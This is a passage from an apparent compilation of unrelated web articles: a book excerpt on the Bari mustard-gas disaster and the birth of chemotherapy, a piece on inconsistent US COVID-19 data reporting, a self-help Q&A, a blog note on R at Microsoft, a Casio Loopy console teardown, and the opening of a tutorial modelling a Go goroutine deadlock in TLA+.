supposed to respond, Alexander appealed to the liaison officer for advice. The man advised him: One did not argue with the prime minister. 
After a sleepless night, Alexander returned early to the hospital determined to prove there had been no mistake about his diagnosis. Churchill was a brilliant man, with an uncanny instinct for the salient fact, and he had put his finger on the most important question about the Bari victims: Why were the toxic effects so much more serious than any other recorded in military history? Far more patients were dying of mustard symptoms at Bari than on the battlefields of WWI, when the fatality rate had been around 2 percent. The death rate in Bari was more than six times higher—and climbing. The difference, he believed, was the amount of mustard absorbed through the skin from the unprecedented, intimate and lengthy contact as a result of being immersed in the oily harbor water, and then left to sit in soaked uniforms. “In this group of cases,” Alexander postulated, “the individuals, to all intents and purposes, were dipped into a solution of mustard-in-oil, and then wrapped in blankets, given warm tea, and allowed a prolonged period for absorption.” Alexander’s medical inquiry into mustard’s effects on the victims was just beginning. As he sat reviewing the case sheets and pathology reports, one recurring observation leapt out at him: the devastating effects on the patients’ white blood cells. He flipped through a stack of records. There it was again and again—the white blood cell counts fell off sharply. In patients who recovered, white blood cell concentrations corrected by the second or third day; but in some cases, the white blood cell count dropped precipitously beginning on the third or fourth day. He noted that lymphocytes, the white blood cells found in the lymph organs and of importance to the immune system, “were the first to disappear.” What he was looking at made the hair on the back of his neck stand on end. Alexander had seen these exact results before, but never in human beings. In March 1942, the authorities at Edgewood, having received the nitrogen mustard compounds smuggled out of Germany, turned the samples over to Alexander to investigate their impacts on the body. Alexander and his colleagues immediately began detailed experimental protocols on animals. The first studies, which recorded the effects of exposure on the skin, eyes and respiratory tracts of rabbits, showed results that were completely in line with exposure to sulfur mustard in the past and with what was expected from a highly toxic agent of this kind. Next, they set up an experiment to determine the effects on the blood and blood-forming organs. Twenty healthy rabbits were exposed to lethal doses of the agent. To the research team’s astonishment, the white blood cell count of the rabbits dropped to zero or points very close to zero. No one at the lab had ever seen such rapid destruction of white blood cells and the accompanying deterioration of lymph nodes and bone marrow. The researchers consulted the literature and found no reports of the same kind of reduction of white cells in the blood, known as leucopenia, or anything that had the same effect. Alexander’s first thought was that they must have a “bad batch of rabbits.” But when they repeated the experiment with a new group, the results were the same. Alexander ordered the tests repeated with other lab animals to rule out the possibility of poor stock or species sensitivity. They tried guinea pigs, rats, mice and goats. 
Each time, they achieved the same dramatic effects: sudden, severe leucopenia, severe lymphopenia, lymph node depletion and marrow depression. After exposure, the white blood cell counts rapidly disappeared, and the lymph nodes were almost completely dissolved, left as “shrunken little shells” of what they had been. While still at Edgewood, Alexander was fascinated by the idea that mustard interfered with the body’s mechanism for producing blood cells, especially white blood cells. Because of the dramatic and reproducible effects, he could not help but wonder about the possibility of using the compounds directly, or in modified forms, on human beings with diseases of the blood. If nitrogen mustard attacked white blood cells, perhaps it could be used to control leukemia, the most common type of cancer in children, with its unrestrained white blood cell growth, by using different dosages to destroy some but not all excess cells without annihilating patients. But when Alexander proposed an ambitious set of experiments into mustard’s medicinal properties, he was told first by his chief, and then, on appeal, by the National Research Council, that this was not the remit of the Edgewood laboratory. There was not enough time or money to pursue collateral lines of investigation that did not facilitate the national defense. He was ordered to put the project aside and return to his work on mustard casualty management, treatment and decontamination. Chasing miracle cures would have to wait until after the war. Now, sitting in an Allied military hospital 6,000 miles away, not even two years later, Alexander held in his hands incontrovertible evidence: “mustard gas did, in truth, selectively destroy blood cells and blood-forming organs,” he wrote. Doctors and medical researchers had never before encountered such an extraordinary level of sulfur mustard toxicity, which, when it mixed with the oil dumped into Bari Harbor, approximated the damage done by the experimental nitrogen mustard compounds—and allowed its systemic effects to be seen clearly for the first time. It had taken a freak accident, and the massive exposures of wartime, to verify in people the phenomenon demonstrated in laboratory rabbits. “It all added up to the same conditions I had seen in my prewar animal work,” Alexander later recalled. “Blood cells disappeared, and lymph nodes just melted away.” He remembered thinking, “If nitrogen mustard could do this, what could it do for a person with leukemia or lymphosarcoma?” Alexander could not save the worst of the Bari mustard gas casualties, he knew, but perhaps he could make their deaths count for something. A one-in-a-million chance had landed him, one of the few doctors in the world who had studied mustard’s curative potential, in the middle of a disaster with a morgue full of case studies. It was an unthinkably rare chance to perform a pioneering investigation into the toxin’s biological effects on the human body—the kind that would be impossible with living volunteers. He ran down the hall, yelling for more blood tests. He made sure special care was taken in preparing specimen samples to send to Edgewood for microscopic examination, and improvised a fixative solution, hoping the tissue specimens would withstand the long journey. The hematological analysis would not be as complete as he would like. The heavy burden carried by Allied combat hospitals, and the limited facilities, would prevent them from conducting important tests, including studies of bone marrow and blood chemistry. 
Alexander would need to be scrupulous in gathering as much data as possible, and in badgering lab technicians to do what he felt was necessary. This time, he wanted to make absolutely sure that his insight into the systemic effects of mustard was entered into the medical record, with an eye toward seeing whether the substance could be used not to destroy, but to heal. On December 27, 1943, Lt. Col. Stewart Alexander submitted his preliminary report on his ten-day investigation of the Bari Harbor catastrophe. It was immediately classified. Eisenhower and Churchill acted in concert to keep the findings secret so there was no chance Hitler could use the incident as an excuse to launch a gas offensive. Any mention of mustard gas was stricken from the official record, and the medical staff of the British hospitals in Bari were instructed to alter the patients’ charts. Alexander’s diagnosis of toxic exposure was deleted and replaced with the generic terminology for combat casualties—burns, lung complications, all other injuries and deaths “due to enemy action.” The feared German chemical attack never came. The Wehr-macht was deterred by logistical constraints, combined with Allied air superiority and the threat of massive retaliatory strikes. Ironically, the Germans had known all along about the source of the poison gas in the harbor. Nazi spies in the port had suspected that the Allies might be concealing mustard bombs among the munitions they were stockpiling in Italy. After the air strike, they sent down their own diver, an Italian frogman loyal to the Fascists, who recovered a fragment of an M47 bomb casing, which confirmed the chemical weapons were American. British officials never acknowledged Alexander’s Bari report, but it garnered high praise from Eisenhower’s senior medical advisers. They lauded the exceptional job Alexander had done under challenging conditions, but told him that a commendation was withheld for fear of “offending the Prime Minister.” Nevertheless, Col. Cornelius P. “Dusty” Rhoads, chief of the Medical Division of the Chemical Warfare Service, hailed Alexander’s meticulous investigation as so complete, and of such immense value to medicine, that it represented almost “a landmark in the history of mustard poisoning.” Rhoads was eager to explore the toxic agent’s therapeutic potential. Like Alexander, he believed the Bari data pointed the way toward a promising new chemical targeting white blood cells that could be used as a weapon in the fight against cancer. Rhoads, who in civilian life was head of New York’s Memorial Hospital for the Treatment of Cancer and Allied Diseases, seized on the wealth of new information provided by the Bari victims as a breakthrough. His ambitious plans for Memorial Hospital now converged with Alexander’s report and crystallized into a single mission—to exploit military research into poison gas to find a chemical that could selectively kill cancer cells. Armed with the Bari report, and the results of a top-secret Yale University trial that demonstrated for the first time that a regimen of intravenous nitrogen mustard—in tiny, carefully calibrated doses—could result in human tumor regression, Rhoads went in search of funding to develop this experimental treatment, known today as chemotherapy. He persuaded Alfred P. Sloan Jr., the chairman of General Motors, along with the company’s wizard engineer, Charles F. 
Kettering, to endow a new institute that would bring together leading scientists and physicians to make a concentrated attack on cancer. On Tuesday, August 7, 1945, the day the world learned that an atom bomb had been dropped on Japan, they announced their plans for the Sloan Kettering Institute for Cancer Research. World War II was over, but the war on cancer had just been launched. The official secrecy surrounding the Bari disaster continued for decades. The military refused to acknowledge the chronic effects of mustard exposure on hundreds of surviving sailors, naval personnel and civilians, resulting in years of suffering, controversy and lawsuits for medical compensation in both the United States and Britain. In 1961, Alexander volunteered to help the National Academy of Sciences conduct a study of the American survivors, but the project stalled when identifying victims of contamination proved too difficult. “All the records said ‘burns due to enemy action,’” recalled Alexander. Alexander was discharged from the Chemical Warfare Service in June 1945, and returned home with a chest full of medals and battle ribbons, as well as a new bride, Lt. Col. Bernice “Bunny” Wilbur, the highest-ranking Army nurse in the Mediterranean Theater. He turned down Rhoads’ offer to work at the fledgling Sloan Kettering Institute. Instead, he kept his promise to his father to continue their family practice in Park Ridge, New Jersey, where he became a much beloved physician and cardiologist, and where he raised two daughters with Bunny. He served for 18 years as director of the Bergen Pines County Hospital, and taught at the medical schools of Columbia and New York University. He never boasted of his wartime exploits, but he always took quiet pride in his unique contribution to medicine, and did not mind that while many textbooks eventually traced the modern age of chemotherapy to the Bari disaster, the details of his investigation remained enshrouded in secrecy. He died on December 6, 1991, of a malignant melanoma—skin cancer—but not before the U.S. Army belatedly commended him, three years earlier, for his actions during the Bari episode. “Without his early diagnosis and rapid initiation of appropriate and aggressive treatment, many more lives would have been lost and the severity of injuries would have been much greater,” the commendation read. “His service to the military and civilians injured during this catastrophe reflects the finest measure of a soldier and physician.” Adapted from The Great Secret: The Classified World War II Disaster That Launched the War on Cancer, by Jennet Conant. Copyright © 2020 by Jennet Conant. Used by permission of W. W. Norton & Company, Inc.
1
US Understanding of the Pandemic Was Shaped by Messy Data
To understand any data set, you have to understand the way its information is compiled. That’s especially true for a patchwork data set such as the one composed of U.S. COVID-19 data, which is the product of 56 smaller systems belonging to each state and territory in the country. In our year of working with COVID-19 data, we harnessed our attention on these systems and found that much of the information they produced reflected their individual structures. This reality runs parallel to the country’s biggest public-health-data challenge: The data pipelines that so deeply affected the pandemic’s trajectory were not given the decades of support—financial and otherwise—needed to perform well under pressure. Instead, a novel threat arrived, and the data response we saw was fragmented, unstandardized, and limited by constraints of the reporting systems. In this post, we’ll offer a summary of how states reported the five major COVID-19 metrics—tests, cases, deaths, hospitalizations, and recoveries—and a look at how reporting complexities shaped our understanding of the pandemic. Before the COVID-19 pandemic, the CDC had never collected comprehensive national testing data for any infectious disease in the United States. But last March, as COVID-19 began to spread throughout the country, the number of tests conducted became the most crucial data point with which to understand the pandemic. Without it, we couldn’t understand whether or where low case counts were just an artifact of inadequate testing. So, last April, the CDC partnered with the Association of Public Health Laboratories (APHL) to start the COVID-19 Electronic Laboratory Reporting Program (CELR), which would eventually collect detailed COVID-19 testing data from every state. While the federal government and APHL onboarded every state to CELR, which took just over a year, the COVID Tracking Project stepped in to compile a national testing count from state health-department websites. Like the CDC, states had never collected data at the scale the pandemic demanded, and as a result, all testing data were incomplete and unstandardized. The pandemic exposed the extent to which the United States’ crucial but chronically underfunded laboratory-data infrastructure was at the mercy of the fax machine, with much manual data failing to make it into state counts or causing distortionary effects, such as data dumps. In addition, as nontraditional settings such as schools and nursing homes started administering antigen tests, states lost sight of how many of these COVID-19 tests had been conducted—opening a hole in our understanding of U.S. testing volume as antigen testing took off in the fall. Laboratories unaccustomed to collecting demographic data failed to collect information on the race and ethnicity of many people seeking COVID-19 testing, even though federal guidance required it. Read: The black hole in America’s COVID-19 data The way states reported testing information was dictated by these difficulties they faced in collecting it, and because each state had slightly different weak spots, reporting was unstandardized. Some states reported just electronically transmitted lab results, while others reported faxed data too. Some states reported antigen tests (or early on, antibody tests) combined with PCR-test data, some separated them out, and some states didn’t report them at all. 
Race and ethnicity data were highly incomplete and unstandardized, impeding efforts to understand the pandemic’s disproportionate effect on Black, Latino, and Indigenous communities. Of all the inconsistencies across states, one extraordinarily daunting problem that did improve over the course of the pandemic was the variation in testing units. For much of the pandemic, some states chose (or had only the capability) to count the number of unique people tested rather than the number of tests conducted. Because individuals are likely to receive multiple tests for COVID-19 over time, states counting people rather than tests appeared to be doing much less testing than others, throwing off measures used to contextualize case counts, such as test positivity. By the end of our data collection, all but two jurisdictions had standardized counting tests rather than people—although there are still some variations within how states count tests. Only the CDC ever stood a chance at collecting testing data that were standardized across jurisdictions. But the federal government has faced its own share of problems in putting together a national testing data set. When federal testing data were first published last May, many states still had not started submitting data to CELR, leading to a data set that was highly divergent from state data because it had different sourcing. And even now, with every state onboarded to CELR, many states show persistent data-quality issues in their federally published data, which have caused continued disparities with their state-published data. Throughout the pandemic, both state and federal testing data were treated by health officials and politicians as having precision and comparability that they simply did not. State test positivity became the basis of travel ordinances and reopening decisions; federal test positivity was used to inform the federal response. Both came with scant acknowledgment of their respective data-quality problems, instead creating a din of conflicting information that damaged public trust. Testing is also the base of the data pipeline for all the other metrics: Many people sought testing for COVID-19 without visiting a clinician, meaning state health departments had to rely on labs sending them test information, without the option of getting additional data from doctors. As a result, the weakness of testing pipelines ended up impeding the collection of all other COVID-19 metrics. Cases are one of the few COVID-19 metrics for which the federal government has issued clear data standards, but the paths states took toward implementing and adhering to these standards varied greatly. These state-specific paths are important to study, because without a standardized way to define a COVID-19 case, making sound comparisons across states or producing a national summary was not always easy. Testing sits at the heart of these case-identification problems. When PCR tests aren’t available—when manufacturing is delayed, when distribution lags, when access to testing sites is limited, and when incentives to seek testing are strained—it becomes crucial to establish another way to build a count. We know that in the first months of the pandemic, probable-case-identification gaps were especially profound. The CDC’s first probable - case definition was difficult for state health departments to work with in practice, because it depended on slow processes such as contact tracing. And states were slow to start publicly reporting probable cases. 
As a result, early probable-case counts severely underestimated the number of people likely to have COVID-19. As states built up their testing programs, and especially as antigen tests began to be deployed as a tool for identifying probable COVID-19 cases, the data grew more and more able to capture a fuller picture of the pandemic. Still, challenges remain. Of the 56 U.S. states and territories we tracked, at least five still report confirmed case numbers only, without disclosing any information about probable cases; a handful more lump probable cases in with their confirmed case counts or don’t make case definitions clear. What’s more, because the data-reporting pipelines needed to send antigen test results to state health officials are brand new, we know that huge numbers of positive antigen test results still never appear in state case counts, just as they never make it into test counts. Like many other countries, the U.S. ended up having two different death counts for COVID-19: the slower but more definitive count released by the CDC’s National Center for Health Statistics, and a more timely one compiled from state data. At the start of the pandemic, the NCHS significantly sped up its process to release provisional death-certificate data on deaths due to COVID-19. However, because the provisional death-certificate data is charted by date of death, recent weeks display a significant taper effect that can be confusing without good documentation. And NCHS data, because it undergoes a federal review, has generally (but not always) moved slower than state counts. For a more up-to-date picture of mortality, you can turn to state data, which the CDC scraped from state dashboards to assemble its own count of COVID-19 deaths. However, at the pandemic’s worst moments, there were still more people dying of COVID-19 than most states’ death - reporting infrastructures could handle. Not only did this problem lead to lags in the data; it also caused delays in issuance of death certificates, which sometimes blocked the relatives of those who had died from receiving health-care coverage or benefits. Read: How many Americans are about to die? The CDC did not issue any guidance about how states should track COVID-19 deaths, leading to a lack of standardization in how states defined the number. Some states counted deaths of individuals who had been identified as having a case of COVID-19, some states counted individuals whose death certificates listed COVID-19, and many used a combination of the two. Generally, states seemed to choose the method that allowed them to collate numbers most quickly within the constraints of their case surveillance and death infrastructures. And though it’s a common refrain that “deaths among cases” might overcount COVID-19 deaths, states using that method ended up, on average, undercounting NCHS death-certificate data by the same amount as states using death certificates. Though these two methods ended up counting deaths at roughly the same speed and comprehensiveness, the federal government did not properly explain that states used different processes to count COVID-19 deaths. Instead, at different times, the CDC seemed conflicted about the definition of the count, saying in its data FAQ that state numbers represent deaths among cases identified according to the Council for State and Territorial Epidemiologists definition, and in a statement to us that the counts represent death-certificate data. 
And because states did not receive any guidance from the CDC on how to report deaths, not all states initially chose their counting methods with an eye toward speed. As a result, some had to switch to faster methods for counting deaths midway through the pandemic, causing significant confusion and sometimes public distrust when numbers abruptly changed. As with other COVID-19 metrics, definitional differences hampered hospitalization - data reporting across the country. There was little standardization in how states reported current or cumulative patients, patients with confirmed or suspected cases, and pediatric cases. Many states didn’t readily define metrics on their websites, and many hospitals simply weren’t providing data. In July, confusion grew when the Trump administration issued a sweeping order that fundamentally changed how COVID-19 hospitalization data were being compiled. In addition to reporting information to state health departments, hospitals across the country were suddenly directed to report COVID-19 numbers to the U.S. Department of Health and Human Services, which oversees the CDC, instead of reporting to the CDC directly. At first, the switch was challenged, to say the least. (We wrote about the initial effects on the data here.) But as we watched hospitalization data closely over the second half of 2020, studying it to see how it tracked with numbers we were gathering from states themselves, we saw that the new protocol had patched the places where crucial data had been missing. In fact, current hospitalization data grew to be so reliably well reported—and federal data tracked with ours so closely—that the metric became a kind of lodestar in our understanding of the pandemic. Read: America’s most reliable pandemic data are now at risk Finally, in November, we decided to remove the “cumulative hospitalization” metric from our website. We knew that data from the early months of the pandemic were drastically incomplete, and we had watched as many states’ cumulative totals sat stagnant for weeks, while their current hospitalization numbers fluctuated. Additionally, 20 states never reported cumulative hospitalizations, making the national sum a large undercount. Ultimately, we decided that reporting the cumulative number of COVID-19 patients hospitalized was helpful in theory but less so in practice, and we tried to guide our data users toward more valuable metrics, such as current hospitalization and new hospital-admissions numbers, instead. Our last of the five major metrics is one that sounds intrinsically hopeful and good, but in reality, it’s just as complicated as the others: recoveries. Unfortunately, the recoveries metric shares many of the same challenges seen across COVID-19 data—it’s poorly defined, unstandardized, not reported in every state, and difficult to fully capture when case counts grow to scales that overwhelm state health departments. What’s more, an additional layer of complexity looms over the recoveries metric, presenting a kind of philosophical dilemma. Scientists are still learning about the long-term health effects of COVID-19, even among asymptomatic cases. Declaring an individual “recovered” simply because they have avoided death can be misleading and insensitive. For all these reasons, the COVID Tracking Project stopped reporting a national summary of recovery figures in November and decided to remove state-level recovery figures from our website in January. 
Instead of providing figures for recoveries, we began to track and display hospital discharges for the eight states providing those data, which had a clearer, more standardized meaning across states. As we wrote about state recovery metrics, our recommendation is that state health officials carefully consider how they discuss and quantify this information, choosing metrics such as “released from isolation” or “inactive cases” over labels that imply full recovery. Over the past two months, a small crew at the COVID Tracking Project has been working to document our year of data collection, reflecting on how best to organize our project’s history so that journalists, policy makers, advocates, and the public might continue to find relevance in our work. As we pored over our research on state reporting, we congealed our findings into a set of common reporting problems that made COVID-19 data especially difficult to aggregate on a national level. States tended to differ on how they defined data, what data they made available, and how they presented what data they did publish, making it difficult to compare data across states. All of those themes come through in the reporting arcs of these five COVID-19 metrics. Read: Why the pandemic experts failed Some of these problems could have been avoided with clearer reporting guidance from the federal government; others were inevitable, given the constraints of the United States’ underfunded public-health infrastructure. But all of them tended to be poorly documented, meaning it took a great deal of excavation to uncover the sources of these problems—or even the existence of the problems themselves. These data challenges may have been readily apparent to or expected by those familiar with the contours of public-health informatics. But pandemics affect us all, and the infrastructure that responds to them is meant to protect us all, so we all deserve to understand how capable the infrastructure is. Frankly, we need to understand its limitations to navigate through a pandemic. Above and beyond any individual reporting practice, we believe that it was the lack of explanations from state governments and, most crucially, the CDC that led to misuse of data and wounded public trust. We tried our best to provide explanations where possible, and we saw transformation when we were able to get the message across to the public. Data users who were frustrated or even doubtful came to trust the numbers. Journalists reported more accurately. Hospitals could better anticipate surges. If we could make just one change to the way state and federal COVID-19 data were reported, it would be to make an open acknowledgment of the limitations of public-health-data infrastructure whenever the data is presented. And if we could make one plea for what comes next, it’s that these systems receive the investment they deserve. This article has been adapted from its original version, which can be read in full at The COVID Tracking Project.
1
Q&A Series_3
Like I warned you: do not open unless you need total transformation. Because at the end of this power-packed letter you will not remain the same.

A. What is the best way to sieve social media's distraction from its usefulness?
B. How do I become good at reading and understanding books? This has been my problem from secondary school till now.
C. Must I learn a skill I think I love?

A) Use social media as a school: Social media will keep distracting us until the end of time. You need to use it to your advantage. First of all, limit the amount of time you spend on social media. (The SuperHuman Guide teaches this - DM for it.) As I use my social media as a school, I only follow people whose content helps me grow. There is a lot of trash content online, and you need to take care in filtering who you follow. Not all status updates are worth viewing; not all groups are worth being a part of. Keep anything that doesn't add value to you far away. If the people you follow don't challenge you to grow daily, you are yet to fully optimise your online environment.
B) Try alternative forms of learning. Audio (podcasts) or videos may work better for you, so explore until you find your best mode of content consumption and stick to it.
C) All skills pay. Choose one and start perfecting it. You might have to try many before you find one to stick with. If you don't try different things you will waste time wondering what would work. Stop pondering and start exploring!

A) How does someone recover from a huge loss as a forex trader or even an entrepreneur?
B) How can I be relentlessly consistent?
C) I want to help people grow too, but I feel maybe I'm not enough or something. How do I overcome this?

A) Keep the loss behind you and move on. I know two people (Ajulu & Odeyinka) who lost over two million in 2018 and 2019 respectively. They didn't die. Dwelling on the loss will keep you paralyzed and keep you from growing.
C) The best way to help people is to help yourself first. Ajulu learnt and grew in obscurity for five years before anyone knew who Ajulu is. I don't know if you even know me, so let's leave who I am out of this... lolz. Let's move on! You have all it takes to help people; you just have to spend time refining it so you are sure of what you are offering.

Thanks for reading. Please drop your feedback & also share if you gained value. Till we see again. 🚀CHEERS TO GROWTH!🥂
1
R at Microsoft
[This article was first published on Revolutions, and kindly contributed to R-bloggers]. It was my great pleasure yesterday to be a presenter in the "Why R Webinar" series, on the topic R at Microsoft. In the talk (which you can watch below) I recounted the history of Microsoft's acquisition of Revolution Analytics, and the various ways Microsoft supports R: its membership of the R Consortium, integration with many products (including demos of Azure ML Service with GitHub Actions, and Azure Functions), and how Microsoft has driven adoption of R in large organizations by making R "IT approved". Many thanks to the Why R Foundation for hosting the talk, and to everyone who asked questions and prompted a lively discussion at the end. You can also find links and resources associated with the talk, including the slides, at the GitHub repository linked below. GitHub (revodavid): R at Microsoft
47
The vision of the anointed, with Thomas Sowell (1995) [video]
132
Isn't she just Misunderstood? The Casio Loopy
Imagine asking Julius Caesar to review the arcade game Galaga. He lacks the knowledge of space that even children have today, and certainly can’t recognize a spaceship; he keeps going on about how using arrows against bugs is a waste of a perfectly good arrow. Even the high score concept is foreign to a man who doesn’t know about the modern arabic numerals, and anyway, he gets way too interested when you happen to mention a CRT monitor’s discharge could kill a man. Would you really learn anything useful about Galaga from his review? And what is the point of this thought? Nothing, totally irrelevant. Let’s talk about the Casio Loopy! Casio is of course a big name in electronics, but they’ve not shown up on this blog at all before. They made some MSX computers, and the Casio PV-1000 and PV-2000 consoles in the early 80’s, but the Loopy has pretty much nothing to do with those. The Casio Loopy is a 32-bit machine with a SuperH CPU, released in 1995. This family of CPUs is probably more famous for its use by Sega, but the SH7021 used in the Loopy appears to be still in production by Renesas. I’m not sure how much the SH7021 has changed over that time; it seems to be an SH-1 system, as opposed to the SH-2 used in the 32X and Saturn, and the SH-4 used in the Dreamcast. The Casio Loopy’s controller is a pretty simple affair; amusingly, the layout may be better for Neo Geo games than SNK’s own Neo Geo CD pad, with the face buttons laid out in a semicircle. But sadly you wouldn’t want to play King of Fighters ‘97 on this; the buttons don’t feel great, with very little travel. For the Loopy, though, they get the job done and it’s comfortable in the hand. The system has just one controller slot. This slot on the front is where the printer outputs. The printer is, as we’ll see, kind of the whole point of the Loopy. The printer prints small stickers, or as the console calls them, “seals”. So, let’s take this girl apart. It’s just held together by cross-head screws on the bottom; somewhat oddly, as the cartridges do use the infamous “Gamebit” security screws. Inside we see that only a single LED is connected to the top now. In the bottom, we see two circuit boards, and the printer mechanism. Notice that the button with scissors on it controls a small bit of scissors that is completely internal to the console, so that there’s no risk of a child cutting themselves. That’s used to separate your pictures. The cartridge eject mechanism, which uses a spring, is a huge pain to remove; it was an even bigger pain to put back on at the end. So look forward to that. Inside, we see the bulk of the circuitry is here, including the SH7021 CPU. Near the CPU we can also see a Sony CXA1645M RGB encoder. This creates the composite video output, which just goes to an RCA plug on the back. The CXA1645M would be a prime place to add an RGB mod, if one wanted better output. However, it being a surface-mount chip makes things a little more tricky to solder to, so I ended up not bothering. For now I think composite is more than enough. The smaller circuitboard is just for power regulation, and it has the actual RCA jacks for audio and video. Interestingly, the power supply that came with the Loopy outputs 24V DC, which is quite a bit higher than most game consoles of the period. The games are cartridge-based. This is a bit of a surprise, as this came out the year after the launch of CD-based consoles like the Sony PlayStation, the NEC PC-FX, and the Sega Saturn. 
This may have been a cost-saving move for the main console; the game cartridges not only contain the game ROM, but also the SRAM used to save the game (there is a battery soldered to the opposite side of the PCB). So what kind of games did the Casio Loopy have? According to a Eurogamer interview, Loopy engineers Tetsuya Hayashi and Kunihiro Matsubara state that they didn’t originally design the console with women in mind; the goal was to provide a unique experience with the stickers. Since young girls liked to play with stickers, that became the target later as the launch lineup was drawn up. By the time commercials were made, the target audience was clear. Which leaves us in a bit of a pickle. I am not a preteen Japanese girl. As a child, I wasn’t really into stickers as their impermanence bothered me. So I’m not sure I can judge this console fairly… But hey, since when has that stopped me? Dream Change is a dress-up game. It’s pretty clear to see what the appeal of this game is to the target audience; you get to choose outfits for your character. Gameplay is controlled through a system of elaborate menus where you can choose the different components of the outfit. It’s not just a sandbox; your outfit can be judged by the game, and meeting the requirements allows you to take your model to various settings. Here, I’m told that I need to do a better job coordinating between heavy and light. At least he’s smiling while doing so. But enough talk. Let’s print a sticker. I’ve got a whole unused new old stock package of sticker stock for the Loopy. Now, the fact that these are still so easily attainable may be a bad sign for the Loopy’s success, but hey, it doesn’t know that. Here’s my girl in her outfit. Even though the game doesn’t like it, I want to remember it, so this is what I want to print. The print goes pretty fast; you can tell that it prints in color as it has to pull the sticker back in and out for each layer. Let’s take a quick look at a 1200dpi scan from my struggling Canon scanner. Forgiving the fadedness, which is from the scanner as we’ll see better colors in the photo below, it looks pretty good; this close up, you can even see detail that the Framemeister-assisted composite capture masks with rainbow bands. The sticker area has quite a bit of “overscan”; for example, the bottom of her shoe will be cut off when I peel it. The thing that’s a real shame, though, is the size. Compare it to a 3.5” floppy disk, as was common at the time, and you can see that a Loopy sticker won’t even cover the entire label area. When you consider the commercial for Little Romance, a game that I don’t have, but which suggests using the seals as panels in a comic book, you can see that they’re pretty tiny for that role. I guess kids do usually have better eyes than adults. Bow-wow Love Story seems to have been one of the more popular games for the system, judging by its wide availability in the aftermarket. It’s an adventure game published by Casio and developed by Alfa System, who also developed Dream Change above, and are credited with contributing work on many great PC Engine games, like Hudson’s port of Ys I&II. They’re also still in business. The game itself is an adventure game telling the story of a girl and her dog. The game is of course all in Japanese, and the story may be too cutesy to be appealing to anyone over the age of 14; it is worth noting that there is a game here, for example, the action segment below, where she combats Miracle Lemon. 
Should she lose, her eyes will be in pain from the sour lemon juice, so be careful! The stickers in this game definitely come off more of an afterthought than Dream Change; a separate section accessible from the title screen let you print stickers based off of locations you’ve been to before, or special moments. This might remind you of The Legend of Zelda: Link’s Awakening DX, or Super Mario Bros. Deluxe on the Game Boy Color, which supported the Game Boy Printer. And I think that’s a pretty good comparison here; I think had Nintendo somehow ended up in a Philips-like deal with Casio, a port of Super Mario Bros. Deluxe to the Loopy may have been a success. Someone get on that. The Casio Loopy, more than any other piece of hardware I’ve looked at, makes me feel like Julius Caesar above. What I can say, though, is the facts: the Loopy was not a very successful system. In fact, FEMICOM Museum states that only one production run was made, and Octavius’ video review says that the console was discontinued a few weeks after launch. There is a little bit more I’d like to say about the Loopy, but that’ll have to wait. And as for whether I’m going to be making Aspect Star “L”? Uh, don’t hold your breath.
125
Finding Goroutine Bugs with TLA+
My job these days is teaching TLA+ and formal methods: specifying designs to find bugs in them. But just knowing the syntax isn’t enough to write specs, and it helps to have examples to draw from. I recently read Chris Siebenmann’s Even in Go, concurrency is still not easy and thought it would make a good case study for writing a spec. In it, he gives an example of Go code which deadlocks:

    /*1 */ func FindAll() []P { // P = process data
    /*2 */     pss, err := ps.Processes()
    /*3 */     [ ... ]
    /*4 */     found := make(chan P)
    /*5 */     limitCh := make(chan struct{}, concurrencyProcesses)
    /*6 */
    /*7 */     for _, pr := range pss {
    /*8 */         limitCh <- struct{}{}
    /*9 */         pr := pr
    /*10*/         go func() {
    /*11*/             defer func() { <-limitCh }()
    /*12*/             [ ... get a P with some error checking ... ]
    /*13*/             found <- P
    /*14*/         }()
    /*15*/     }
    /*16*/     [ ... ]
    /*17*/
    /*18*/     var results []P
    /*19*/     for p := range found {
    /*20*/         results = append(results, p)
    /*21*/     }
    /*22*/     return results
    /*23*/ }

The bug is that the goroutines only receive from limitCh to release their token after sending their result to the unbuffered found channel, while the main code only starts receiving from found after running through the entire loop, and the main code takes the token in the loop and blocks if no tokens are available.
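To make the failure concrete before we start specifying, here is a minimal, self-contained Go sketch of the same shape (the names findAll, n, and tokens and the trivial “work” are mine, not Chris’s code): run it with more goroutines than tokens and the Go runtime detects the deadlock on its own.

    package main

    import "fmt"

    func findAll(n, tokens int) []int {
        found := make(chan int)                // unbuffered, like `found` above
        limitCh := make(chan struct{}, tokens) // buffered, like `limitCh` above

        for i := 0; i < n; i++ {
            limitCh <- struct{}{} // main takes the token...
            i := i
            go func() {
                defer func() { <-limitCh }() // ...the goroutine releases it, but only
                found <- i                   // after this unbuffered send succeeds
            }()
        }

        // Main only starts receiving here, after the loop above has finished.
        var results []int
        for j := 0; j < n; j++ {
            results = append(results, <-found)
        }
        return results
    }

    func main() {
        // With 3 goroutines and 2 tokens this deadlocks; the runtime aborts with
        // "fatal error: all goroutines are asleep - deadlock!"
        fmt.Println(findAll(3, 2))
    }

The exact numbers don’t matter; what matters is that main is blocked on the token send while every goroutine is blocked on the found send.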
Let’s model this in TLA+!

Note: this example assumes some basic knowledge of TLA+ and PlusCal. If you know what a process label is, then you’re fine. We’re not looking at race conditions so you shouldn’t need to know the finer points of labels and actions, but it might make things more intuitive. I included syntax explanations where appropriate. It also assumes some basic knowledge of Go, which I am in no way qualified to explain.

It’s good to start with some upfront thinking of how we are going to approach this problem. There’s two parts to formally specifying something: describing the system and describing the properties of the system. In this case we can ignore the second part, since we’re only looking for deadlocks. It would be good modeling practice to add sanity check properties, like type invariants, but they are not strictly necessary.

We have a choice of doing everything in TLA+ or using a mix of TLA+ and PlusCal, a sequential algorithm DSL that compiles to TLA+. Since the Go code is highly sequential and because PlusCal is easier for outsiders to understand, I will use PlusCal. This will cause a bit of impedance mismatch down the road for unbuffered channels but overall it’s a net benefit.

The core structure of a PlusCal spec is a set of defined processes with both local and global state. At the very least we will have one process for main and one process for each of the goroutines. There are three “complex bits” to Chris’s code sample: go, defer, and the nature of Go channels.

defer runs cleanup code when a goroutine is finished running. For now we’ll represent this by moving the deferred code to its own label, but we could also use a PlusCal procedure to be more accurate.

go spawns a new goroutine. Since PlusCal requires us to define all of our processes in advance, we can’t “spawn” a new goroutine. What we can do instead is define each process but prevent them from running. Then we add a flag that says whether or not the goroutine was initialized in the behavior yet. It would look something like this:

    variables initialized = [w \in Routines |-> FALSE];
    \* ...

    process goroutine \in Routines
    begin
      Work:
        await initialized[self];
        \* ...

So each goroutine awaits being initialized by the main process before it does anything. This is how we can emulate spawning new processes.

